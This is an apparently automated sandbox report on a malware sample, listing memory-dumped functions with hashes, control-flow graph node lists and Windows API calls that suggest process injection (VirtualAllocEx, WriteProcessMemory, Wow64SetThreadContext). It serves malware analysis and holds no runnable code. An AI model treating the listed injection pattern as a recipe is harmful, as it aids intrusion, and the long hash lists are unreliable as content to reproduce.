                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A543A0 Relevance: .2, Instructions: 231COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b57552f51d39d800c0df45f73105eaebe2031493ec89cdbb38b0a7582c85dd2e
                                                                                      • Instruction ID: 921bdcdd92e6e4b38a53f430154d58d715b6b06fda59084ab00965dbbc5ea013
                                                                                      • Opcode Fuzzy Hash: b57552f51d39d800c0df45f73105eaebe2031493ec89cdbb38b0a7582c85dd2e
                                                                                      • Instruction Fuzzy Hash: C7911770D15219DFDB48DFA5E68099DFBF2FB89300F20A42AE816BB224D7349945CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A54391 Relevance: .2, Instructions: 227COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da1a7854a3f2e336a3adf8953a051c056e88ef1eecc9848e768fe5664261dacc
                                                                                      • Instruction ID: e9274bc7d175d0ee388bd232bbe04981fcf62cb9f3f02fe130cb92cd7e696c80
                                                                                      • Opcode Fuzzy Hash: da1a7854a3f2e336a3adf8953a051c056e88ef1eecc9848e768fe5664261dacc
                                                                                      • Instruction Fuzzy Hash: C0912670D15209EFDB48DFA5E68099DFBF2FB89300F20A42AE816B7264D7349945CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A54088 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3148af90cec65e59a7922dbde40a0305efbd0d88212bafb5c43cf40ab5302f4
                                                                                      • Instruction ID: a8e24efed16d075a8e72f785be8ee04e00f0f76653a89e525dc42c895fb3f9cc
                                                                                      • Opcode Fuzzy Hash: d3148af90cec65e59a7922dbde40a0305efbd0d88212bafb5c43cf40ab5302f4
                                                                                      • Instruction Fuzzy Hash: 76811174E04219CFDB44DFAAD9809EEFBB1FB98300F20951AD911B7254D7389962CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A54078 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f99818966c78d5ca44ad98db53789d160cb33c51f1af4c17066840dac1326d6
                                                                                      • Instruction ID: 676b253125ded6076fb34cb3be970589036c3f943a3e8339b2e7bb27463fd1f9
                                                                                      • Opcode Fuzzy Hash: 4f99818966c78d5ca44ad98db53789d160cb33c51f1af4c17066840dac1326d6
                                                                                      • Instruction Fuzzy Hash: E6810175E04219CFDB44DFAAD9809EEBBB1FB98300F20991AD811B7254D7389962CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A50007 Relevance: .1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12b457b07bd071618bc992658ddb065cb4b947d4561d476fdd649b144954f567
                                                                                      • Instruction ID: 713b8ff918991d934a96ca8d3266e1bbfd4d8933d829c8b8fd3b5d8f31a2b4a7
                                                                                      • Opcode Fuzzy Hash: 12b457b07bd071618bc992658ddb065cb4b947d4561d476fdd649b144954f567
                                                                                      • Instruction Fuzzy Hash: FB316F71D057848FD719CF6A8C502DABFF3AFCA300F19C1A6D408AB265DA780946CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A50040 Relevance: .1, Instructions: 66COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcbb70883cc11238a6b6ac61079bcd60c12dd280f55fcba4c371bd89a2296071
                                                                                      • Instruction ID: d409095308f94a22dc0f454c7d67f71a557ef54657368d17c54cb3f4ee9e9d57
                                                                                      • Opcode Fuzzy Hash: dcbb70883cc11238a6b6ac61079bcd60c12dd280f55fcba4c371bd89a2296071
                                                                                      • Instruction Fuzzy Hash: F721ED71E006188BDB58CFABD9442DEFBF3AFC8310F14C17AD908A6258DB741A45CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE3E4A Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17fd22b4b1fdb01d66a0a571d44831c95e6706a51c8e94f04953fcda97a8d2c6
                                                                                      • Instruction ID: 9b47765291c6f095fe4d02200f42c66d99dea4fa9ef88b235ce08fabb5aebd6a
                                                                                      • Opcode Fuzzy Hash: 17fd22b4b1fdb01d66a0a571d44831c95e6706a51c8e94f04953fcda97a8d2c6
                                                                                      • Instruction Fuzzy Hash: 47C09226F8F308DAABC02C8578144FCF3BCD68F462F803062D21EA3992412082A685C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A51530 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 143 6a51530-6a5154e 144 6a51555-6a5155a 143->144 145 6a51550 143->145 157 6a5155d call 6a51628 144->157 158 6a5155d call 6a5161a 144->158 145->144 146 6a51563 147 6a5156a-6a51586 146->147 148 6a5158f-6a51590 147->148 149 6a51588 147->149 150 6a51592-6a515a6 148->150 151 6a515fd-6a51601 148->151 149->146 149->150 149->151 152 6a515d6-6a515f8 149->152 154 6a515b9-6a515c0 150->154 155 6a515a8-6a515b7 150->155 152->147 156 6a515c7-6a515d4 154->156 155->156 156->147 157->146 158->146
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      • Opcode ID: c70508e03bd1a02970807bb0eb4866fb8d88939b9f05e44df587b8bb67480f35
                                                                                      • Instruction ID: fd12d8930ebf51f82c5586e2b92796c9f329cbe8734340d8d7cbf508465ff83a
                                                                                      • Opcode Fuzzy Hash: c70508e03bd1a02970807bb0eb4866fb8d88939b9f05e44df587b8bb67480f35
                                                                                      • Instruction Fuzzy Hash: 5421FAB0D15209DFDB44DFA9D540AAEFBF1FF89300F24D56AD509A7214E7309A45CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE13C5 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 159 6ee13c5-6ee1465 161 6ee149e-6ee14be 159->161 162 6ee1467-6ee1471 159->162 167 6ee14f7-6ee1526 161->167 168 6ee14c0-6ee14ca 161->168 162->161 163 6ee1473-6ee1475 162->163 165 6ee1498-6ee149b 163->165 166 6ee1477-6ee1481 163->166 165->161 169 6ee1485-6ee1494 166->169 170 6ee1483 166->170 178 6ee155f-6ee1619 CreateProcessA 167->178 179 6ee1528-6ee1532 167->179 168->167 171 6ee14cc-6ee14ce 168->171 169->169 172 6ee1496 169->172 170->169 173 6ee14d0-6ee14da 171->173 174 6ee14f1-6ee14f4 171->174 172->165 176 6ee14de-6ee14ed 173->176 177 6ee14dc 173->177 174->167 176->176 180 6ee14ef 176->180 177->176 190 6ee161b-6ee1621 178->190 191 6ee1622-6ee16a8 178->191 179->178 181 6ee1534-6ee1536 179->181 180->174 183 6ee1538-6ee1542 181->183 184 6ee1559-6ee155c 181->184 185 6ee1546-6ee1555 183->185 186 6ee1544 183->186 184->178 185->185 187 6ee1557 185->187 186->185 187->184 190->191 201 6ee16aa-6ee16ae 191->201 202 6ee16b8-6ee16bc 191->202 201->202 203 6ee16b0 201->203 204 6ee16be-6ee16c2 202->204 205 6ee16cc-6ee16d0 202->205 203->202 204->205 208 6ee16c4 204->208 206 6ee16d2-6ee16d6 205->206 207 6ee16e0-6ee16e4 205->207 206->207 209 6ee16d8 206->209 210 6ee16f6-6ee16fd 207->210 211 6ee16e6-6ee16ec 207->211 208->205 209->207 212 6ee16ff-6ee170e 210->212 213 6ee1714 210->213 211->210 212->213 215 6ee1715 213->215 215->215
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06EE1606
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: 1e0e8addcad4b65f86d084739629348dc8fa50d5709132e082191a9f69ea165f
                                                                                      • Instruction ID: a04f5d0b46ba1a778fb916bafd9f56e88661baec378f4ec0f06cc9d91261bdef
                                                                                      • Opcode Fuzzy Hash: 1e0e8addcad4b65f86d084739629348dc8fa50d5709132e082191a9f69ea165f
                                                                                      • Instruction Fuzzy Hash: BEA14B71D1031ADFDB50DFA8C840BEDBBB2AF48314F1485AAE809A7290D7749985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE13D0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 216 6ee13d0-6ee1465 218 6ee149e-6ee14be 216->218 219 6ee1467-6ee1471 216->219 224 6ee14f7-6ee1526 218->224 225 6ee14c0-6ee14ca 218->225 219->218 220 6ee1473-6ee1475 219->220 222 6ee1498-6ee149b 220->222 223 6ee1477-6ee1481 220->223 222->218 226 6ee1485-6ee1494 223->226 227 6ee1483 223->227 235 6ee155f-6ee1619 CreateProcessA 224->235 236 6ee1528-6ee1532 224->236 225->224 228 6ee14cc-6ee14ce 225->228 226->226 229 6ee1496 226->229 227->226 230 6ee14d0-6ee14da 228->230 231 6ee14f1-6ee14f4 228->231 229->222 233 6ee14de-6ee14ed 230->233 234 6ee14dc 230->234 231->224 233->233 237 6ee14ef 233->237 234->233 247 6ee161b-6ee1621 235->247 248 6ee1622-6ee16a8 235->248 236->235 238 6ee1534-6ee1536 236->238 237->231 240 6ee1538-6ee1542 238->240 241 6ee1559-6ee155c 238->241 242 6ee1546-6ee1555 240->242 243 6ee1544 240->243 241->235 242->242 244 6ee1557 242->244 243->242 244->241 247->248 258 6ee16aa-6ee16ae 248->258 259 6ee16b8-6ee16bc 248->259 258->259 260 6ee16b0 258->260 261 6ee16be-6ee16c2 259->261 262 6ee16cc-6ee16d0 259->262 260->259 261->262 265 6ee16c4 261->265 263 6ee16d2-6ee16d6 262->263 264 6ee16e0-6ee16e4 262->264 263->264 266 6ee16d8 263->266 267 6ee16f6-6ee16fd 264->267 268 6ee16e6-6ee16ec 264->268 265->262 266->264 269 6ee16ff-6ee170e 267->269 270 6ee1714 267->270 268->267 269->270 272 6ee1715 270->272 272->272
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06EE1606
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: 8ce42aaa92fbe186dc83ead7073571299ad606b117586ae9e3bced40ef582d14
                                                                                      • Instruction ID: 6be82567384bbde99b08822b1187c057b64d9bbed0c59fc8ce4474c17e52c55e
                                                                                      • Opcode Fuzzy Hash: 8ce42aaa92fbe186dc83ead7073571299ad606b117586ae9e3bced40ef582d14
                                                                                      • Instruction Fuzzy Hash: 7D914C71D10319DFDB50CFA8C841BEDBBB2BF48314F1485AAE809A7290DB749985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0227DAF0 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 273 227daf0-227daff 274 227db01-227db0e call 227ce40 273->274 275 227db2b-227db2f 273->275 280 227db24 274->280 281 227db10-227db1e call 227dd88 274->281 276 227db43-227db84 275->276 277 227db31-227db3b 275->277 284 227db86-227db8e 276->284 285 227db91-227db9f 276->285 277->276 280->275 281->280 289 227dc60-227dd20 281->289 284->285 287 227dbc3-227dbc5 285->287 288 227dba1-227dba6 285->288 290 227dbc8-227dbcf 287->290 291 227dbb1 288->291 292 227dba8-227dbaf call 227ce4c 288->292 323 227dd22-227dd25 289->323 324 227dd28-227dd53 GetModuleHandleW 289->324 295 227dbd1-227dbd9 290->295 296 227dbdc-227dbe3 290->296 294 227dbb3-227dbc1 291->294 292->294 294->290 295->296 298 227dbe5-227dbed 296->298 299 227dbf0-227dbf2 call 227ce5c 296->299 298->299 302 227dbf7-227dbf9 299->302 304 227dc06-227dc0b 302->304 305 227dbfb-227dc03 302->305 306 227dc0d-227dc14 304->306 307 227dc29-227dc36 304->307 305->304 306->307 309 227dc16-227dc26 call 227ce6c call 227ce7c 306->309 314 227dc59-227dc5f 307->314 315 227dc38-227dc56 307->315 309->307 315->314 323->324 325 227dd55-227dd5b 324->325 326 227dd5c-227dd70 324->326 325->326
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: ea2307780e2e6db94d21940bdfa1f8f4a524ade5132e4778f069291a304ec45a
                                                                                      • Instruction ID: 8f527ba31bfd914e7d9665ff39420c3d32d70fa0ef7ff55c6c87e45d082f30fd
                                                                                      • Opcode Fuzzy Hash: ea2307780e2e6db94d21940bdfa1f8f4a524ade5132e4778f069291a304ec45a
                                                                                      • Instruction Fuzzy Hash: 16713470A14B068FD724DF6AD44079ABBF2FF88304F00892DD48AD7A54DB75E946CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1231 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 407 6ee1231-6ee12c5 ReadProcessMemory 412 6ee12ce-6ee12fe 407->412 413 6ee12c7-6ee12cd 407->413 413->412
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06EE12B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: 72d1ceb4b1914a62e99a4a05850b1085eadeb9eef2baadb3082da83a58b83089
                                                                                      • Instruction ID: 56c9edd9689a4f5d4f12a595bdb68fb01e94f6f76492e0f5bf3a16fc332f2acf
                                                                                      • Opcode Fuzzy Hash: 72d1ceb4b1914a62e99a4a05850b1085eadeb9eef2baadb3082da83a58b83089
                                                                                      • Instruction Fuzzy Hash: BD3196B1C003489FCB10DFAAD845AEFBBF4BF49314F10842AE958A7241C7389544DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1140 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 417 6ee1140-6ee1196 420 6ee1198-6ee11a4 417->420 421 6ee11a6-6ee11e5 WriteProcessMemory 417->421 420->421 423 6ee11ee-6ee121e 421->423 424 6ee11e7-6ee11ed 421->424 424->423
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06EE11D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: c8347f2791d607a76f3f6d7470479bf053722569b2adf12fb6aef96622d8ad1f
                                                                                      • Instruction ID: e90e7abd84b09083863c934dc77076cb911728cc8a7a5d4ea04eb79e3898ba33
                                                                                      • Opcode Fuzzy Hash: c8347f2791d607a76f3f6d7470479bf053722569b2adf12fb6aef96622d8ad1f
                                                                                      • Instruction Fuzzy Hash: 1D2146B19003599FCB10DFA9C885BEEBBF5FF48314F10842AE959A7250C7789944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE0FA8 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 428 6ee0fa8-6ee0ffb 431 6ee0ffd-6ee1009 428->431 432 6ee100b-6ee103b Wow64SetThreadContext 428->432 431->432 434 6ee103d-6ee1043 432->434 435 6ee1044-6ee1074 432->435 434->435
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE102E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: 25019843bffd887ad223c23bd19de20b1fe0a84aaae8f071b926db4d81cbd906
                                                                                      • Instruction ID: 3587256bfadc0365a2a9892c21f462c19fb77332e156ef1b8a0b2595fea157b9
                                                                                      • Opcode Fuzzy Hash: 25019843bffd887ad223c23bd19de20b1fe0a84aaae8f071b926db4d81cbd906
                                                                                      • Instruction Fuzzy Hash: 762145B19003089FCB10DFAAC485BEFBBF5EF48324F10842AD459A7240DB789985CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1148 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 439 6ee1148-6ee1196 441 6ee1198-6ee11a4 439->441 442 6ee11a6-6ee11e5 WriteProcessMemory 439->442 441->442 444 6ee11ee-6ee121e 442->444 445 6ee11e7-6ee11ed 442->445 445->444
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06EE11D8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: eef869b1e1d7131eeb2c287ac54d7b65bef863a2f10d6bdc269616be1810c0c3
                                                                                      • Instruction ID: 4539a6a73ce8b0b13c487354eecb1342f67767f5dfda999bc67d409713ec32cb
                                                                                      • Opcode Fuzzy Hash: eef869b1e1d7131eeb2c287ac54d7b65bef863a2f10d6bdc269616be1810c0c3
                                                                                      • Instruction Fuzzy Hash: C42127B19003599FCB10DFA9C985BDEBBF5FF48314F108429E958A7250C7789944CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE0FB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 449 6ee0fb0-6ee0ffb 451 6ee0ffd-6ee1009 449->451 452 6ee100b-6ee103b Wow64SetThreadContext 449->452 451->452 454 6ee103d-6ee1043 452->454 455 6ee1044-6ee1074 452->455 454->455
                                                                                      APIs
                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE102E
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: ContextThreadWow64
                                                                                      • String ID:
                                                                                      • API String ID: 983334009-0
                                                                                      • Opcode ID: fc5b0bdc288635e0fa0b8ec2c3244a3a719b5a6a3fecb03d0eac4903581c45ff
                                                                                      • Instruction ID: 31599a59b83bab451883fb30799a751cb7f048a6c6a690d7569942ca6b14049c
                                                                                      • Opcode Fuzzy Hash: fc5b0bdc288635e0fa0b8ec2c3244a3a719b5a6a3fecb03d0eac4903581c45ff
                                                                                      • Instruction Fuzzy Hash: 6E2149B1D003098FDB10DFAAC4857EEBBF4EF48324F10842AD459A7240D7789985CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1238 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 459 6ee1238-6ee12c5 ReadProcessMemory 462 6ee12ce-6ee12fe 459->462 463 6ee12c7-6ee12cd 459->463 463->462
                                                                                      APIs
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06EE12B8
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1726664587-0
                                                                                      • Opcode ID: ff08f9dd345fe096ecc7297d7020ea6cd186ac9f3eaf101e94810f1efe93cedf
                                                                                      • Instruction ID: d75453c312ed0f58e95fb183d2af3f7c2989999c6dcd05129986b132352cb4ac
                                                                                      • Opcode Fuzzy Hash: ff08f9dd345fe096ecc7297d7020ea6cd186ac9f3eaf101e94810f1efe93cedf
                                                                                      • Instruction Fuzzy Hash: 8A2128B19003599FCB10DFAAC845BDEFBF5FF48320F108429E558A7250C7349544DBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1080 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 467 6ee1080-6ee1103 VirtualAllocEx 471 6ee110c-6ee1131 467->471 472 6ee1105-6ee110b 467->472 472->471
                                                                                      APIs
                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE10F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857503131.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6ee0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 27073238c9afd6dc36b2d39c73985aeede9dfeda2cb3581807c9e2fc4279aa9d
                                                                                      • Instruction ID: 5875d8f5e6ccfa86da51b6d1c18b3ec66bda452a995abcc9a50c1763fa042184
                                                                                      • Opcode Fuzzy Hash: 27073238c9afd6dc36b2d39c73985aeede9dfeda2cb3581807c9e2fc4279aa9d
                                                                                      • Instruction Fuzzy Hash: C21167758002489BCB20DFAAC805BDFFFF5EB48324F10841EE459A7210CB359584CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0227CEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 476 227cea8-227df88 478 227df90-227dfbf LoadLibraryExW 476->478 479 227df8a-227df8d 476->479 480 227dfc1-227dfc7 478->480 481 227dfc8-227dfe5 478->481 479->478 480->481
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0227DDC1,00000800,00000000,00000000), ref: 0227DFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1849013837.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_2270000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: a280180a9f588effcaccd2518cfa01f4b95605c78485161913d7b6764165be51
                                                                                      • Instruction ID: 3229660237065a5690db3d3da9d4871230ce2f25771f6004cc316b0624da1eb4
                                                                                      • Opcode Fuzzy Hash: a280180a9f588effcaccd2518cfa01f4b95605c78485161913d7b6764165be51
                                                                                      • Instruction Fuzzy Hash: E51142B69043098FDB10CF9AC444AEEFBF4EF88314F10842AE419B7200C774A544CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06EE1088 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
